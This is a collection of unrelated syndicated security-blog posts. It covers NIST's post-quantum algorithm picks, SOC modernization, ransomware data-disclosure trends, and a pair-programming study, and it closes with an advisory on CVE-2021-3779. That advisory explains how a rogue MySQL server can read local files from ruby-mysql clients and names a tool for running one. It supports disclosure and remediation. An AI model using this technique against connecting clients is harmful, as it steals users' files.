This brings us to Dilithium. Compared to Falcon it’s easy to implement safely and has better signing performance to boot. Its signatures and public keys are much larger though, which is problematic. For example, to each browser visiting this very page, we sent six signatures and two public keys. If we’d replace them all with Dilithium2 we would be looking at 17kB of additional data. Last year, we ran an experiment to see the impact of additional data in the TLS handshake:

NIST’s pleasant post-quantum surprise
Impact of larger signatures on TLS handshake time. For the details, see this blog.

There are some caveats to point out: first, we used a big 30-segment initial congestion window (icwnd). With a normal icwnd, the bump at 40KB moves to 10KB. Secondly, the height of this bump is the round-trip time (RTT), which due to our broadly distributed network, is very low for us. Thus, switching to Dilithium alone might well double your TLS handshake times. More disturbingly, we saw that some connections stopped working when we added too much data:

NIST’s pleasant post-quantum surprise
Amount of failed TLS handshakes by size of added signatures. For the details, see this blog.

We expect this was caused by misbehaving middleboxes. Taken together, we concluded that early adoption of post-quantum signatures on the Internet would likely be more successful if those six signatures and two public keys would fit in 9KB. This can be achieved by using Dilithium for the handshake signature and Falcon for the other (offline) signatures.

At most one of Dilithium or Falcon

Unfortunately, NIST stated on several occasions that it would choose only two signature schemes, but not both Falcon and Dilithium:

NIST’s pleasant post-quantum surprise
Slides of NIST’s status update after the conclusion of round 2

The reason given is that both Dilithium and Falcon are based on structured lattices and thus do not add more security diversity. Because of the difficulty of implementing Falcon correctly, we expected NIST to standardize Dilithium and as a backup SPHINCS+. With that guess, we saw a big challenge ahead: to keep the Internet fast we would need some difficult and rigorous changes to the protocols.

The twist

However, to everyone’s surprise, NIST picked both! NIST chose to standardize Dilithium, Falcon and SPHINCS+. This is a very pleasant surprise for the Internet: it means that post-quantum authentication will be much simpler to adopt.

SPHINCS+, the conservative choice

In the excitement of the fight between Dilithium and Falcon, we could almost forget about SPHINCS+, a stateless hash-based signature. Its big advantage is that its security is based on the second-preimage resistance of the underlying hash-function, which is well understood. It is not a stretch to say that SPHINCS+ is the most conservative choice for a signature scheme, post-quantum or otherwise. But even as a co-submitter of SPHINCS+, I have to admit that its performance isn’t that great.

There is a lot of flexibility in the parameter choices for SPHINCS+: there are tradeoffs between signature size, signing time, verification time and the maximum number of signatures that can be minted. Of the current parameter sets, the “s” are optimized for size and “f” for signing speed; both chosen to allow 264  signatures. NIST has hinted at reducing the signature limit, which would improve performance. A custom choice of parameters for a particular application would improve it even more, but would still trail Dilithium.

Having discussed NIST choices, let’s have a look at those that were left out.

The other finalists

There were three other finalists: GeMSS, Picnic and Rainbow. None of these are progressing to a fourth round.

Picnic is a conservative choice similar to SPHINCS+. Its construction is interesting: it is based on the secure multiparty computation of a block cipher. To be efficient, a non-standard block cipher is chosen. This makes Picnic’s assumptions a bit less conservative, which is why NIST preferred SPHINCS+.

GeMSS and Rainbow are specialists: they have large public key sizes (hundreds of kilobytes), but very small signatures (33–66 bytes). They would be great for applications where the public key can be distributed out of band, such as for the Signed Certificate Timestamps included in certificates for Certificate Transparency. Unfortunately, both turned out to be broken.

Signature schemes on the horizon

Although we expect Falcon and Dilithium to be practical for the Internet, there is ample room for improvement. Many new signature schemes have been proposed after the start of the competition, which could help out a lot. NIST recognizes this and is opening a new competition for post-quantum signature schemes.

A few schemes that have caught our eye already are UOV, which has similar performance trade-offs to those for GeMSS and Rainbow; SQISign, which has small signatures, but is computationally expensive; and MAYO, which looks like it might be a great general-purpose signature scheme.

Stateful hash-based signatures

Finally, we’d be remiss not to mention the post-quantum signature scheme that already has been standardized by NIST: the stateful hash-based signature schemes LMS and XMSS. They share the same conservative security as their sibling SPHINCS+, but have much better performance. The rub is that for each keypair there are a finite number of signature slots and each signature slot can only be used once. If it’s used twice, it is insecure. This is why they are called stateful; as the signer must remember the state of all slots that have been used in the past, and any mistake is fatal. Keeping the state perfectly can be very challenging.

What else

What’s next?

NIST will draft standards for the selected schemes and request public feedback on them. There might be changes to the algorithms, but we do not expect anything major. The standards are expected to be finalized in 2024.

In the coming months, many languages, libraries and protocols will already add preliminary support for the current version of Kyber and the other post-quantum algorithms. We’re helping out to make post-quantum available to the Internet as soon as possible: we’re working within the IETF to add Kyber to TLS and will contribute upstream support to popular open-source libraries.

Start experimenting with Kyber today

Now is a good time for you to try out Kyber in your software stacks. We were lucky to correctly guess Kyber would be picked and have experience running it internally. Our tests so far show it performs great. Your requirements might differ, so try it out yourself.

The reference implementation in C is excellent. The Open Quantum Safe project integrates it with various TLS libraries, but beware: the algorithm identifiers and scheme might still change, so be ready to migrate.

Our CIRCL library has a fast independent implementation of Kyber in Go. We implemented Kyber ourselves so that we could help tease out any implementation bugs or subtle underspecification.

Experimenting with post-quantum signatures

Post-quantum signatures are not as urgent, but might require more engineering to get right. First off, which signature scheme to pick?

  • Are large signatures and slow operations acceptable? Go for SPHINCS+.
  • Do you need more performance?
    • Can your signature generation be timed, for instance when generated on-the-fly? Then go for (a hybrid, see below, with) Dilithium.
    • For offline signatures, go for (a hybrid with) Falcon.
  • If you can keep a state perfectly, check out XMSS/LMS.

Open Quantum Safe can be used to test these out. Our CIRCL library also has a fast independent implementation of Dilithium in Go. We’ll add Falcon and SPHINCS+ soon.

Hybrids

A hybrid is a combination of a classical and a post-quantum scheme. For instance, we can combine Kyber512 with X25519 to create a single Kyber512X key agreement. The advantage of a hybrid is that the data remains secure against non-quantum attackers even if Kyber512 turns out broken. It is important to note that it’s not just about the algorithm, but also the implementation: Kyber512 might be perfectly secure, but an implementation might leak via side-channels. The downside is that two key-exchanges are performed, which takes more CPU cycles and bytes on the wire. For the moment, we prefer sticking with hybrids, but we will revisit this soon.

Post-quantum security levels

Each algorithm has different parameters targeting various post-quantum security levels. Up till  now we’ve only discussed the performance characteristics of security level 1 (or 2 in case of Dilithium, which doesn’t have level 1 parameters.) The definition of the security levels is rather interesting: they’re defined as being as hard to crack by a classical or quantum attacker as specific instances of AES and SHA:

Level Definition, as least as hard to break as …
1 To recover the key of AES-128 by exhaustive search
2 To find a collision in SHA256 by exhaustive search
3 To recover the key of AES-192 by exhaustive search
4 To find a collision in SHA384 by exhaustive search
5 To recover the key of AES-256 by exhaustive search

So which security level should we pick? Is level 1 good enough? We’d need to understand how hard it is for a quantum computer to crack AES-128.

Grover’s algorithm

In 1996, two years after Shor’s paper, Lov Grover published his quantum search algorithm. With it, you can find the AES-128 key (given known plain and ciphertext) with only 264 executions of the cipher in superposition. That sounds much faster than the 2127 tries on average for a classical brute-force attempt. In fact, it sounds like security level 1 isn’t that secure at all. Don’t be alarmed: level 1 is much more secure than it sounds, but it requires some context.

To start, a classical brute-force attempt can be parallelized — millions of machines can participate, sharing the work. Grover’s algorithm, on the other hand, doesn’t parallelize well because the quadratic speedup disappears over that portion. To wit, a billion quantum computers would still have to do 249 iterations each to crack AES-128.

Then each iteration requires many gates. It’s estimated that these 249 operations take roughly 264 noiseless quantum gates. If each of our billion quantum computers could execute a billion noiseless quantum gates per second, then it’d still take 500 years.

That already sounds more secure, but we’re not done. Quantum computers do not execute noiseless quantum gates: they’re analogue machines. Every operation has a little bit of noise. Does this mean that quantum computing is hopeless? Not at all! There are clever algorithms to turn, say, a million noisy qubits into one less noisy qubit. It doesn’t just add qubits, but also extra gates. How much depends very much on the exact details of the quantum computer.

It is not inconceivable that in the future there will be quantum computers that effectively execute far more than a billion noiseless gates per second, but it will likely be decades after Shor’s algorithm is practical. This all is a long-winded way of saying that security level 1 seems solid for the foreseeable future.

Hedging against attacks

A different reason to pick a higher security level is to hedge against better attacks on the algorithm. This makes a lot of sense, but it is important to note that this isn’t a foolproof strategy:

  • Not all attacks are small improvements. It’s possible that improvements in cryptanalysis break all security levels at once.
  • Higher security levels do not protect against implementation flaws, such as (new) timing vulnerabilities.

A different aspect, that’s arguably more important than picking a high number, is crypto agility: being able to switch to a new algorithm/implementation in case of a break of trouble. Let’s hope that we will not need it, but now we’re going to switch, it’s nice to make it easier in the future.

CIRCL is Post-Quantum Enabled

We already mentioned CIRCL a few times, it’s our optimized crypto-library for Go whose development we started in 2019. CIRCL already contains support for several post-quantum algorithms such as the KEMs Kyber and SIKE and signature schemes Dilithium and Frodo. The code is up to date and compliant with test vectors from the third round. CIRCL is readily usable in Go programs either as a library or natively as part of Go using this fork.

NIST’s pleasant post-quantum surprise

One goal of CIRCL is to enable experimentation with post-quantum algorithms in TLS. For instance, we ran a measurement study to evaluate the feasibility of the KEMTLS protocol for which we’ve adapted the TLS package of the Go library.

As an example, this code uses CIRCL to sign a message with eddilithium2, a hybrid signature scheme pairing Ed25519 with Dilithium mode 2.

package main

import (
  "crypto"
  "crypto/rand"
  "fmt"

  "github.com/cloudflare/circl/sign/eddilithium2"
)

func main() {
  // Generating random keypair.
  pk, sk, err := eddilithium2.GenerateKey(rand.Reader)

  // Signing a message.
  msg := []byte("Signed with CIRCL using " + eddilithium2.Scheme().Name())
  signature, err := sk.Sign(rand.Reader, msg, crypto.Hash(0))

  // Verifying signature.
  valid := eddilithium2.Verify(pk, msg, signature[:])

  fmt.Printf("Message: %v\n", string(msg))
  fmt.Printf("Signature (%v bytes): %x...\n", len(signature), signature[:4])
  fmt.Printf("Signature Valid: %v\n", valid)
  fmt.Printf("Errors: %v\n", err)
}
Message: Signed with CIRCL using Ed25519-Dilithium2
Signature (2484 bytes): 84d6882a...
Signature Valid: true
Errors: <nil>

As can be seen the application programming interface is the same as the crypto.Signer interface from the standard library. Try it out, and we’re happy to hear your feedback.

Conclusion

This is a big moment for the Internet. From a set of excellent options for post-quantum key agreement, NIST chose Kyber. With it, we can secure the data on the Internet today against quantum adversaries of the future, without compromising on performance.

On the authentication side, NIST pleasantly surprised us by choosing both Falcon and Dilithium against their earlier statements. This was a great choice, as it will make post-quantum authentication more practical than we expected it would be.

Together with the cryptography community, we have our work cut out for us: we aim to make the Internet post-quantum secure as fast as possible.

Want to follow along? Keep an eye on this blog or have a look at research.cloudflare.com.

Want to help out? We’re hiring and open to research visits.

Today’s SOC Strategies Will Soon Be Inadequate

Post Syndicated from Dina Durutlic original https://blog.rapid7.com/2022/07/08/todays-soc-strategies-will-soon-be-inadequate/

Today’s SOC Strategies Will Soon Be Inadequate

New research sponsored by Rapid7 explores the momentum behind security operations center (SOC) modernization and the role extended detection and response (XDR) plays. ESG surveyed over 370 IT and cybersecurity professionals in the US and Canada –  responsible for evaluating, purchasing, and utilizing threat detection and response security products and services – and identified key trends in the space.

The first major finding won’t surprise you: Security operations remain challenging.

Cybersecurity is dynamic

A growing attack surface, the volume and complexity of security alerts, and public cloud proliferation add to the intricacy of security operations today. Attacks increased 31% from 2020 to 2021, according to Accenture’s State of Cybersecurity Resilience 2021 report. The number of attacks per company increased from 206 to 270 year over year. The disruptions will continue, ultimately making many current SOC strategies inadequate if teams don’t evolve from reactive to proactive.

In parallel, many organizations are facing tremendous challenges closer to home due to a lack of skilled resources. At the end of 2021, there was a security workforce gap of 377,000 jobs in the US and 2.7 million globally, according to the (ISC)2 Cybersecurity Workforce Study. Already-lean teams are experiencing increased workloads often resulting in burnout or churn.

Key findings on the state of the SOC

In the new ebook, SOC Modernization and the Role of XDR, you’ll learn more about the increasing difficulty in security operations, as well as the other key findings, which include:

  • Security professionals want more data and better detection rules – Despite the massive amount of security data collected, respondents want more scope and diversity.
  • SecOps process automation investments are proving valuable – Many organizations have realized benefits from security process automation, but challenges persist.
  • XDR momentum continues to build – XDR awareness continues to grow, though most see XDR supplementing or consolidating SOC technologies.
  • MDR is mainstream and expanding – Organizations need help from service providers for security operations; 85% use managed services for a portion or a majority of their security operations.

Download the full report to learn more.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

For Finserv Ransomware Attacks, Obtaining Customer Data Is the Focus

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/07/07/for-finserv-ransomware-attacks-obtaining-customer-data-is-the-focus/

For Finserv Ransomware Attacks, Obtaining Customer Data Is the Focus

Welcome back to the third installment of Rapid7’s Pain Points: Ransomware Data Disclosure Trends blog series, where we’re distilling the key highlights of our ransomware data disclosure research paper one industry at a time. This week, we’ll be focusing on the financial services industry, one of the most most highly regulated — and frequently attacked — industries we looked at.

Rapid7’s threat intelligence platform (TIP) scans the clear, deep, and dark web for data on threats, and operationalizes that data automatically with our Threat Command product. We used that data to conduct unique research into the types of data threat actors disclose about their victims. The data points in this research come from the threat actors themselves, making it a rare glimpse into their actions, motivations, and preferences.

Last week, we discussed how the healthcare and pharmaceutical industries are particularly impacted by double extortion in ransomware. We found that threat actors target and release specific types of data to coerce victims into paying the ransom. In this case, it was internal financial information (71%), which was somewhat surprising, considering financial information is not the focus of these two industries. Less surprising, but certainly not less impactful, were the disclosure of customer or patient information (58%) and the unusually strong emphasis on intellectual property in the pharmaceuticals sector of this vertical (43%).

Customer data is the prime target for finserv ransomware

But when we looked at financial services, something interesting did stand out: Customer data was found in the overwhelming majority of data disclosures (82%), not necessarily the company’s internal financial information. It seems threat actors were more interested in leveraging the public’s implied trust in financial services companies to keep their personal financial information private than they were in exposing the company’s own financial information.

Since much of the damage done by ransomware attacks — or really any cybersecurity incident — lies in the erosion of trust in that institution, it appears threat actors are seeking to hasten that erosion with their initial data disclosures. The financial services industry is one of the most highly regulated industries in the market entirely because it holds the financial health of millions of people in their hands. Breaches at these institutions tend to have outsized impacts.

Employee info is also at risk

The next most commonly disclosed form of data in the financial services industry was personally identifiable information (PII) and HR data. This is personal data of those who work in the financial industry and can include identifying information like Social Security numbers and the like. Some 59% of disclosures from this sector included this kind of information.

This appears to indicate that threat actors want to undermine the company’s ability to keep their own employees’ data safe, and that can be corroborated by another data point: In some 29% of cases, data disclosure pointed to reconnaissance for future IT attacks as the motive. Threat actors want financial services companies and their employees to know that they are and will always be a major target. Other criminals can use information from these disclosures, such as credentials and network maps, to facilitate future attacks.

As with the healthcare and pharmaceutical sectors, our data showed some interesting and unique motivations from threat actors, as well as confirmed some suspicions we already had about why they choose the data they choose to disclose. Next time, we’ll be taking a look at some of the threat actors themselves and the ways they’ve impacted the overall ransomware “market” over the last two years.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

A pair programming approach for engaging girls in the Computing classroom: Study results

Post Syndicated from Katharine Childs original https://www.raspberrypi.org/blog/gender-balance-in-computing-pair-programming-approach-engaging-girls/

Today we share the second report in our series of findings from the Gender Balance in Computing research programme, which we’ve been running as part of the National Centre for Computing Education and with various partners. In this £2.4 million research programme, funded by the Department for Education in England, we aim to identify ways to encourage more female learners to engage with Computing and choose to study it further.

A teacher encourages a learner in the computing classroom.

Previously, we shared the evaluation report about our pilot study of using a storytelling approach with very young computing learners. This new report, again coming from the Behavioural Insights Team (BIT) which acts as the programme’s independent evaluator, describes our study of another teaching approach.

Existing research suggests that computing is not always taught in a way that is engaging for girls in particular [1], and that we can improve this. With the intervention at hand, we wanted to explore the effects of using a pair programming teaching approach with primary school learners aged 8 to 11. We have critically and carefully examined the findings, which show mixed outcomes regarding the effectiveness of the approach, and we believe that the research provides insights that increase our shared understanding of how to teach computing effectively to young learners. 

Computing education through a collaborative lens

Many people think that writing computer programs is a task carried out by people working individually. A 2017 study of 8- and 9-year-olds [2] confirms this: when asked to draw a picture of a computer scientist doing work, 90% of the children drew a picture of one person working alone. This stereotype is present in teaching and learning about computing and computer science; many computer programming lessons take place in a way that promotes solitary working, with individual students sitting in front of separate computers, working on their own code and debugging their own errors.

A girl codes at a laptop while a woman looks on during a Code Club session.

Professional software development rarely happens like this. For example, at the Raspberry Pi Foundation, our software engineers work collaboratively on design and often pair up to solve problems. Computing education research also has identified the importance of looking at computer programming through a collaborative lens. This viewpoint allows us to see computing as a subject with scope for collaborative group work in which students create useful applications together and are part of a community where programming has a shared social context [3]. 

Researching collaborative learning in the primary computing classroom 

One teaching approach in computing that promotes collaborative learning is pair programming (a practice also used in industry). This is a structured way of working on programming tasks  where learners are paired up and take turns acting as the driver or the navigator. The driver controls the keyboard and mouse and types the code. The navigator reads the instructions, supports the driver by watching out for errors in the code, and thinks strategically about next steps and solutions to problems. Learners swap roles every 5 to 10 minutes, to ensure that both partners can contribute equally and actively to the collaborative learning.

Two female learners code at a computer together.

As one part of the Gender Balance in Computing programme, we designed a project to explore the effect of pair programming on girls’ attitudes towards computing. This project builds on research from the USA which suggests that solving problems collaboratively increases girls’ persistence when they encounter difficulties in programming tasks [4].

In the Pair Programming project, we worked with teachers of Year 4 (ages 8–9) and Year 6 (ages 10–11) in schools in England. From January to March 2020, we ran a pilot study with 10 schools and used the resulting teacher feedback to finalise the training and teaching materials for a full randomised controlled trial. Due to the coronavirus pandemic, we trained teachers in the pair programming approach using an online course instead of face-to-face training.

A tweet from a school about taking part in the pair programming intervention of the Gender Balance in Computing research programme.
A tweet from a school about taking part in the pair programming study.

The randomised controlled trial ran from September to December 2021 with 97 schools. Schools were randomly allocated to either the intervention group and used the pair programming training and the scheme of work we designed, or to the control group and taught Computing in their usual way, not aware that we were investigating the effects of pair programming. Due to the coronavirus pandemic, our training of teachers in the pair programming approach had to take place via an online course instead of face to face.

Teachers in both groups delivered 12 weeks of Computing lessons, in which learners used Scratch programming to draw shapes and create animations. The lessons covered computing concepts from Key Stage 2 (ages 7–11), such as using sequences, selection, and repetition in programs, as well as digital literacy skills such as using technology respectfully.

What can we learn about pair programming from the study? 

The findings about this particular intervention were limited by the amount of data the independent evaluators at BIT were able to collect amongst learners and teachers given the ongoing pandemic. BIT’s evaluation was primarily based on quantitative data collected from learners at the start and the end of the intervention. To collect the data, they used a validated instrument called the Student Computer Science Attitude Survey (SCSAS), which asks learners about their attitudes towards Computing. The evaluators compared the datasets gathered from the intervention group (who took part in pair programming lessons) and the control group (who took part in Computing lessons taught with a ‘business as usual’ model).

A teacher watches two female learners code in Code Club session in the classroom.

The evaluators’ data analysis found no statistically significant evidence that the pair programming approach positively affected girls’ attitudes towards computing or their intention to study computing in the future. The lack of statistically significant results, called a null result in research projects, can appear disappointing at first. But our work involves careful reflection and critical thinking about all outcomes of our research, and the result of this project is no exception. These are factors that may have contributed towards the result: 

  • The independent evaluators suggested that the intervention may lead to different findings if it were implemented again without the disruptions caused by the pandemic. One of their recommendations was to revert to our original planned model of providing face-to-face training to teachers delivering the pair programming approach, and we believe this would embed a deeper understanding of the approach. 
  • Our research built upon a prior study [4] that suggested a connection between pair programming and increased confidence about problem-solving in girls of a similar age. That study took place in a non-formal setting in an all-girls group, whereas our research was situated in formal education in mixed gender groups. It may be that these differences are significant. 
  • It may be that there is no causal link between using the pair programming approach and an increase in girls’ attitudes towards computing, or that the link may only become apparent over a longer time-scale, or that the pair programming approach needs to be combined with other strategies to achieve a positive effect. 

The evaluators also gathered qualitative data by running teacher and learner interviews, and we were pleased that this data provided some rich insights into the benefits of using a pair programming approach in the primary classroom, and gave some promising indications of possible benefits for female learners in particular. 

  1. Teachers spoke positively about the use of paired activities, and felt that having the defined roles of driver and navigator helped both partners to contribute equally to the programming tasks. Learners said that they enjoyed working in pairs, even though there could be some moments of frustration. Some of the teachers were even planning to integrate pair programming into future lessons. This suggests that the approach was effective both in engaging and motivating learners, as well as in facilitating the planned learning outcomes of the lessons,  and that it can be used more widely in primary computing teaching.

“I don’t know why I’ve never thought to do computing like that, actually, because it’s a really good vehicle for the fact that there are two roles, clearly defined. There’s all your conversation, and knowledge comes through that, and then they’re both equally having a turn.” — Primary school teacher (report, p. 38)

“I like working with both [both as a partner and by yourself] because when you do pair programming, you’re collaborating with your partner, making links, and you have to tell them what to do. But if you have a really good idea and then they put the wrong thing in the wrong place, it’s quite annoying.” — Female learner (report, p. 40)

  1. Both teachers and learners felt that having the support of a partner boosted learners’ confidence, which echoes previous research in the field [5, 6]. In computing, boys more accurately assess their capabilities, whereas girls tend to underestimate their performance [7]. When learners feel a positive emotion such as confidence towards a subject, combined with a belief that they can succeed in tasks related to that subject, this shows self-efficacy [8]. Our findings suggest that, through the use of the pair programming approach, both boys and girls improved their sense of self-efficacy towards Computing, which is corroborated by quotes from learners themselves. This is interesting because a sense of self-efficacy in Computing is linked to the decisions to pursue further study in the subject [9]. More research could build on this observation. 

“I do think that having that equal time to have a go at both, thinking of the girls I’ve got, will have helped my girls, because they lack a bit of confidence. They were learning very quickly that, ‘Actually, yes, we are sure. We can do this.’” — Primary teacher (report, p. 44)

“It might be easier to do pair programming [compared to ‘normal’ lessons] because if you’re stuck, your partner can be helpful.” — Female learner (report, p. 43)

Find out more about pair programming 

  • Download our Big Book of Computing Pedagogy a free PDF and read about pair programming on pages 58 and 59.
  • Watch this short video that shows pair programming being used in a primary classroom. 
  • Read the evaluation report of the pair programming intervention, where you’ll also find more quotes from teachers and learners.
  • Try the free training course on pair programming we designed and used for this project. It also includes links to the lesson plans that teachers worked with. 

Collaboration in our research

We will continue to publish evaluation reports and our reflections on the other projects in the Gender Balance in Computing programme. If you would like to stay up-to-date with the programme, you can sign up to the newsletter.

Two learners at a desktop computer doing coding.

The insights gained from this trial will feed forwards into our future work. Through the process of working with schools on this project, we have increased our understanding of the process of research in educational settings in many ways. We are very grateful for the input from teachers who took part in the first stage of the trial, with whom we developed an effective co-production model for developing resources, a model we will use in future research projects. Teachers who took part in the second stage of the project told us that the resources we provided were of good quality, which demonstrates the success of this co-production approach to developing resources. 

In our new Raspberry Pi Computing Education Research Centre, created with the University of Cambridge Department of Computer Science and Technology, we will collaborate closely with teachers and schools when implementing and evaluating research projects. You are invited to the free in-person launch event of the Centre on 20 July in Cambridge, UK, where we hope to meet many teachers, researchers, and other education practitioners to strengthen a collaborative community around computing education research.

References

[1] Goode, J., Estrella, R., & Margolis, J. (2018). Lost in Translation: Gender and High School Computer Science. In Women and Information Technology. https://doi.org/10.7551/mitpress/7272.003.0005

[2] Alexandria K. Hansen, Hilary A. Dwyer, Ashley Iveland, Mia Talesfore, Lacy Wright, Danielle B. Harlow, and Diana Franklin. 2017. Assessing Children’s Understanding of the Work of Computer Scientists: The Draw-a-Computer-Scientist Test. In Proceedings of the 2017 ACM SIGCSE Technical Symposium on Computer Science Education (SIGCSE ’17). Association for Computing Machinery, New York, NY, USA, 279–284. https://doi.org/10.1145/3017680.3017769

[3] Yasmin B. Kafai and Quinn Burke. 2013. The social turn in K-12 programming: moving from computational thinking to computational participation. In Proceeding of the 44th ACM technical symposium on Computer science education (SIGCSE ’13). Association for Computing Machinery, New York, NY, USA, 603–608. https://doi.org/10.1145/2445196.2445373

[4] Linda Werner & Jill Denning (2009) Pair Programming in Middle School, Journal of Research on Technology in Education, 42:1, 29-49. https://doi.org/10.1080/15391523.2009.10782540

[5] Charlie McDowell, Linda Werner, Heather E. Bullock, and Julian Fernald. 2006. Pair programming improves student retention, confidence, and program quality. Commun. ACM 49, 8 (August 2006), 90–95. https://doi.org/10.1145/1145287.1145293

[6] Denner, J., Werner, L., Campe, S., & Ortiz, E. (2014). Pair programming: Under what conditions is it advantageous for middle school students? Journal of Research on Technology in Education, 46(3), 277–296. https://doi.org/10.1080/15391523.2014.888272

[7] Maria Kallia and Sue Sentance. 2018. Are boys more confident than girls? the role of calibration and students’ self-efficacy in programming tasks and computer science. In Proceedings of the 13th Workshop in Primary and Secondary Computing Education (WiPSCE ’18). Association for Computing Machinery, New York, NY, USA, Article 16, 1–4. https://doi.org/10.1145/3265757.3265773

[8] Bandura, A. (1977). Self-efficacy: Toward a unifying theory of behavioral change. Psychological Review, 84(2), 191–215. https://doi.org/10.1037/0033-295X.84.2.191

[9] Allison Mishkin. 2019. Applying Self-Determination Theory towards Motivating Young Women in Computer Science. In Proceedings of the 50th ACM Technical Symposium on Computer Science Education (SIGCSE ’19). Association for Computing Machinery, New York, NY, USA, 1025–1031. https://doi.org/10.1145/3287324.3287389

The post A pair programming approach for engaging girls in the Computing classroom: Study results appeared first on Raspberry Pi.

For Ransomware Double-Extorters, It’s All About the Benjamins — and Data From Healthcare and Pharma

Post Syndicated from Tom Caiazza original https://blog.rapid7.com/2022/06/28/for-ransomware-double-extorters-its-all-about-the-benjamins-and-data-from-healthcare-and-pharma/

For Ransomware Double-Extorters, It's All About the Benjamins — and Data From Healthcare and Pharma

Welcome to the second installment in our series looking at the latest ransomware research from Rapid7. Two weeks ago, we launched “Pain Points: Ransomware Data Disclosure Trends”, our first-of-its-kind look into the practice of double extortion, what kinds of data get disclosed, and how the ransomware “market” has shifted in the two years since double extortion became a particularly nasty evolution to the practice.

Today, we’re going to talk a little more about the healthcare and pharmaceutical industry data and analysis from the report, highlighting how these two industries differ from some of the other hardest-hit industries and how they relate to each other (or don’t in some cases).

But first, let’s recap what “Pain Points” is actually analyzing. Rapid7’s threat intelligence platform (TIP) scans the clear, deep, and dark web for data on threats and operationalizes that data automatically with our Threat Command product. This means we have at our disposal large amounts of data pertaining to ransomware double extortion that we were able to analyze to determine some interesting trends like never before. Check out the full paper for more detail, and view some well redacted real-world examples of data breaches while you’re at it.

For healthcare and pharma, the risks are heightened

When it comes to the healthcare and pharmaceutical industries, there are some notable similarities that set them apart from other verticals. For instance, internal finance and accounting files showed up most often in initial ransomware data disclosures for healthcare and pharma than for any other industry (71%), including financial services (where you would think financial information would be the most common).

After that, customer and patient data showed up more than 58% of the time — still very high, indicating that ransomware attackers value these data from these industries in particular. This is likely due to the relative amount of damage (legal and regulatory) these kinds of disclosures could have on such a highly regulated field (particularly healthcare).

For Ransomware Double-Extorters, It's All About the Benjamins — and Data From Healthcare and Pharma

All eyes on IP and patient data

Where the healthcare and pharmaceutical differed were in the prevalence of intellectual property (IP) disclosures. The healthcare industry focuses mostly on patients, so it makes sense that one of their biggest data disclosure areas would be personal information. But the pharma industry focuses much more on research and development than it does on the personal information of people. In pharma-related disclosures, IP made up 43% of all disclosures. Again, the predilection on the part of ransomware attackers to “hit ’em where it hurts the most” is on full display here.

Finally, different ransomware groups favor different types of data disclosures, as our data indicated. When it comes to the data most often disclosed from healthcare and pharma victims, REvil and Cl0p were the only who did it (10% and 20% respectively). For customer and patient data, REvil took the top spot with 55% of disclosures, with Darkside behind them at 50%. Conti and Cl0p followed with 42% and 40%, respectively.

So there you have it: When it comes to the healthcare and pharmaceutical industries, financial data, customer data, and intellectual property are the most frequently used data to impose double extortion on ransomware victims.

Ready to dive further into the data? Check out the full report.

Additional reading:

NEVER MISS A BLOG

Get the latest stories, expertise, and news about security today.

CVE-2021-3779: Ruby-MySQL Gem Client File Read (FIXED)

Post Syndicated from Tod Beardsley original https://blog.rapid7.com/2022/06/28/cve-2021-3779-ruby-mysql-gem-client-file-read-fixed/

CVE-2021-3779: Ruby-MySQL Gem Client File Read (FIXED)

The ruby-mysql Ruby gem prior to version 2.10.0 maintained by Tomita Masahiro is vulnerable to an instance of CWE-610: Externally Controlled Reference to a Resource in Another Sphere, wherein a malicious MySQL server can request local file content from a client without explicit authorization from the user. The initial CVSSv3 estimate for this issue is 6.5. Note that this issue does not affect the much more popular mysql2 gem. This issue was fixed in ruby-mysql 2.10.0 on October 23, 2021, and users of ruby-mysql are urged to update.

Product description

The ruby-mysql Ruby gem is an implementation of a MySQL client. While it is far less popular than the mysql2 gem, it serves a particular niche audience of users that desire a pure Ruby implementation of MySQL client functionality without linking to an external library (as mysql2 does).

Credit

This issue was reported to Rapid7 by Hans-Martin Münch of MOGWAI LABS GmbH, initially as a Metasploit issue, and is being disclosed in accordance with Rapid7’s vulnerability disclosure policy after coordination with the upstream maintainer of this library, as well as JPCERT/CC and CERT/CC.

Exploitation

A malicious actor can read arbitrary files from a client that uses ruby-mysql to communicate to a rogue MySQL server and issue database queries. In these cases, the server has the option to create a database reply using the LOAD DATA LOCAL statement, which instructs the client to provide additional data from a local file readable by the client (and not a “local” file on the server). The easiest way to demonstrate this issue is to run an instance of Rogue-MySql-Server by Gifts and perform any database query using the vulnerable version of the mysql gem.

Note that this behavior is a defined and expected option for servers and is described in the documentation, quoted below:

Because LOAD DATA LOCAL is an SQL statement, parsing occurs on the server side, and transfer of the file from the client host to the server host is initiated by the MySQL server, which tells the client the file named in the statement. In theory, a patched server could tell the client program to transfer a file of the server’s choosing rather than the file named in the statement. Such a server could access any file on the client host to which the client user has read access. (A patched server could in fact reply with a file-transfer request to any statement, not just LOAD DATA LOCAL, so a more fundamental issue is that clients should not connect to untrusted servers.) [emphasis added]

So, the vulnerability is not so much a MySQL server or protocol issue, but a vulnerability in a client that does not at least provide an option to disable LOAD DATA LOCAL queries; this is the situation with version 2.9.14 and earlier versions of ruby-mysql.

There is also prior work on this type of issue, and interested readers should refer to Knownsec 404 Team‘s article describing the issue for a thorough understanding of the dangers of LOAD DATA LOCAL and untrusted MySQL servers.

Impact

As stated, this issue only affects Ruby-based MySQL clients that connect to malicious MySQL servers. The vast majority of clients already know who they’re connecting to, and while an attacker could poison DNS records or otherwise intercede in network traffic to capture unwitting clients, such network shenanigans will be foiled by routine security controls like SSL certificates. The true risk is posed only to those people who connect to random and unknown MySQL servers in unfamiliar environments.

In other words, penetration testers and other opportunistic MySQL attackers are most at risk from this kind of vulnerability. CVE-2021-3779 fits squarely in the category of “hacking the hackers,” where an aggressive honeypot is designed to lie in wait for wandering MySQL scanners and attackers and steal data local to those connecting clients.

This is the reason why Hans-Martin Münch of MOGWAI LABS GmbH first brought this to Rapid7’s attention as an issue in Metasploit. While Metasploit users are indeed the most at risk to falling victim to an exploit for this vulnerability, the underlying issue was quickly identified as one in the shared open-source library code that Metasploit depends on for managing MySQL connections to remote servers. (One such example is the MySQL hashdump auxiliary module.)

Remediation

Users who implement ruby-mysql should update their packaged gem with the latest version of ruby-mysql, as it has been fixed in version 2.10.0. The current version (as of this writing) is 3.0.0 and was released in November of 2021.

Users unable to update can patch around the issue by ensuring that CLIENT_LOCAL_FILES is disallowed by the client, similarly to how Metasploit Framework initially remediated this issue while waiting on a fix from the upstream maintainer.

Disclosure timeline

